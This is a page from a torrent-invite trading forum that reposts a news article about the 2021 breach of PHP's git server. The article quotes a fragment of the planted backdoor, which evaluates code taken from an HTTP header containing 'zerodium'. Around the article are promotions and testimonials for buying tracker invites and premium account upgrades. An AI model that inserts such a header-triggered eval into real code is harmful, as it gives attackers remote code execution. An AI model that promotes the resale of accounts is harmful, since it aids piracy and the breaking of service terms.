Jump to content
🎅🎄 Signup today to get free TorrentLeech or ProAudioTorrents Invite! Get access to premium trackers, free seedboxes by signing up. Buy, Trade, Sell Or Find Free Invites for HDBits, PTP, Empornium, PrivateHD, Sinderella, etc 🎅🎄 ×

Hackers backdoor PHP source code after breaching internal git server - Piracy News and Crypto Updates - InviteHawk - Your Only Source for Free Torrent Invites

Buy, Sell, Trade or Find Free Torrent Invites for Private Torrent Trackers Such As redacted, blutopia, losslessclub, femdomcult, filelist, Chdbits, Uhdbits, empornium, iptorrents, hdbits, gazellegames, animebytes, privatehd, myspleen, torrentleech, morethantv, bibliotik, alpharatio, blady, passthepopcorn, brokenstones, pornbay, cgpeers, cinemageddon, broadcasthenet, learnbits, torrentseeds, beyondhd, cinemaz, u2.dmhy, Karagarga, PTerclub, Nyaa.si, Polishtracker etc.

Sponsored Seedbox | VPN
Request Free IPTV Trial

Hackers backdoor PHP source code after breaching internal git server

Chewy_fox
 Share

Recommended Posts

Chewy_fox Invite Master

Chewy_fox

A hacker compromised the server used to distribute the PHP programming language and added a backdoor to source code that would have made websites vulnerable to complete takeover, members of the open source project said.

Two updates pushed to the PHP Git server over the weekend added a line that, if run by a PHP-powered website, would have allowed visitors with no authorization to execute code of their choice. The malicious commits here and here gave the code the code-injection capability to visitors who had the word “zerodium” in an HTTP header.

PHP.net hacked, code backdoored

The commits were made to the php-src repo under the account names of two well-known PHP developers, Rasmus Lerdorf and Nikita Popov. “We don't yet know how exactly this happened, but everything points toward a compromise of the git.php.net server (rather than a compromise of an individual git account),” Popov wrote in a notice published on Sunday night.

In the aftermath of the compromise, Popov said that PHP maintainers have concluded that their standalone Git infrastructure is an unnecessary security risk. As a result, they will discontinue the git.php.net server and make GitHub the official source for PHP repositories. Going forward, all PHP source code changes will be made directly to GitHub rather than to git.php.net.

The malicious changes came to public attention no later than Sunday night by developers including Markus Staab, Jake Birchallf, and Michael Voříšek as they scrutinized a commit made on Saturday. The update, which purported to fix a typo, was made under an account that used Lerdorf’s name. Shortly after the first discovery, Voříšek spotted the second malicious commit, which was made under Popov’s account name. It purported to revert the previous typo fix.

onvert_to_string(enc); if (strstr(Z_STRVAL_P(enc), "zerodium")) { zend_try { zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");

Zerodium is a broker that buys exploits from researchers and sells them to government agencies for use in investigations or other purposes. Why the commits referenced Zerodium is not clear. The company’s CEO, Chaouki Bekrar, said on Twitter Monday that Zerodium wasn’t involved.

“Cheers to the troll who put ‘Zerodium’ in today’s PHP git compromised commits,” he wrote. “Obviously, we have nothing to do with this. Likely, the researcher(s) who found this bug/exploit tried to sell it to many entities but none wanted to buy this crap, so they burned it for fun.

Bad karma

Prior to the compromise, The PHP Group handled all write access to the repository on their own git server http://git.php.net/ using what Popov called a “home-grown” system called Karma. It provided developers different levels of access privileges depending on previous contributions. GitHub, meanwhile, had been a mirror repository.

Now, the PHP Group is abandoning the self-hosted and managed git infrastructure and replacing it with GitHub. The change means that GitHub is now the “canonical” repository. The PHP Group will no longer use the Karma system. Instead, contributors will have to be part of the PHP organization on GitHub and must use two-factor authentication for accounts with the ability to make commits.

This weekend’s event isn’t the first time php.net servers have been breached with the intent of performing a supply chain attack. In early 2019, the widely used PHP Extension and Application Repository temporarily shut down most of the site after discovering that hackers replaced the main package manager with a malicious one. Group developers said that anyone who had downloaded the package manager in the past six months should get a new copy.

PHP runs an estimated 80 percent of websites. There are no reports of websites incorporating the malicious changes into their production environments.

The changes were likely made by people who wanted brag about their unauthorized access to the PHP Git server rather than those trying to actually backdoor websites that use PHP, said HD Moore, co-founder and CEO of network discovery platform Rumble.

“Sounds like the attackers are trolling Zerodium or trying to give the impression that the code was backdoored for much longer,” he told Ars. “Either way, I would be spending a lot of time going through previous commits if I had any security interest in PHP.”

Link to comment
Share on other sites
Silent Watcher Invite King

Silent Watcher

Avoid unnecessary posts such as 'Thank you', 'Welcome', etc. Such posts will be deleted and user will be warned if it happens again. If caught spamming, the following actions are applicable -

  • First time - Warning
  • Second time - 5000 Points will be deducted
  • Third time - Ban for 7 days
  • Fourth time - Permanent Ban

If the post helped you, reward the user by reacting to the post like this -

1.jpg

Link to comment
Share on other sites
The last post in this topic was made more than 14 days ago. Only post in this topic if you have something valuable to add. Irrelevant posts are not allowed and you will be warned/banned for spamming old topics.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Read this before posting -
  • Only post if you have something valuable to contribute.
  • Avoid unnecessary posts such as 'Thank you', 'Welcome', etc. Such posts will be deleted and you will be warned if it happens again.
  • If the post helped you, reward the user by reacting to the post like this -                      1.jpg
Guest
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Customer Reviews

    lazytime77
    Wow! This is my first time buying an invite from J.Stash (and on InviteHawk) and I am very happy with the results. This is 100% the real deal. I'll keep coming back for more. Thank you so much for putting this site up. This place is a gem!
    GlitterBow6
    An excellent experience from start to finish! J.Stash was very knowledgeable and responsive throughout the entire process. What's more, J.Stash was highly professional and courteous, always taking time to answer any questions that I had. I greatly recommend this seller and would definitely purchase from J.Stash again!!
    goon64
    J.Stash has my full recommendation. It's rare to work with a seller who possesses and demonstrates not just integrity and quick delivery, but Ethan also went above and beyond when there were issues with the product (not his fault at all). Thank you J.Stash.
    insomniac
    Purchased an invite from J.Stash, the seller was very professional and fast with their turn around times. The price was amazing and the whole site is absolutely amazing. will definitely purchase more from him. I have been searching for an invite for this website for many months and J.Stash solved my request faster than lightning.
    ChocoPie
    Bought Crunchyroll Premium upgrade from J.Stash It works, my account is now premium and I have access to all the shows! Thanks a lot J.Stash for having this wonderful service among many other amazing services in your portfolio! Highly recommend purchasing from J.Stash! This is one of the many successful orders he has processed for me!
    ChocoPie
    Registered an account on InviteHawk and placed an order for 6 different trackers with J.Stash Got all of them delivered in less than 60 mins! How does he do it? 🙂 He is brilliantly fast! Absolutely love his service and communication efforts! Thanks J.Stash! You rock 🙂 This has been by far the best experience I have ever had buying invites for private trackers.
    capri28790
    Everything went just perfect. He makes me a very good impression both as person and as professional seller. Glad I found this site and met him virtually here. I wish I could spread the word about, but since this is not quit a good idea, I just want to share with other users here my best appreciations regarding J.Stash. Highly recommended: good communication, safe shop, fast delivery.
    BUTTHEADBILL
    Purchased a Spotify upgrade through him and used bitcoin and found the entire experience to be great. I am a total newbie to this site. And I wasn't sure what to expect. I am so amazed at how fast this was handled and how great everything went.
    renascor
    In all my years of finding affordable services throughout the web, I have found no provider more responsive, more committed to excellent customer service, or more accountable to keeping to the terms of the services being obtained. When something stops working, the issues are addressed ASAP. When any questions arrive, they are responded to promptly. When situations arrive post service rendered even months down the road, J.Stash has your back to help navigate through them. Highly recommended.
    flipsie
    Bought a VIP access to the forum and got exactly what I wanted+more within reasonable time! Second time buying from J.Stash and my experience was exceptional, like last time. Would definitely buy from him again in there near future.

  • Similar Topics

×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.

  I accept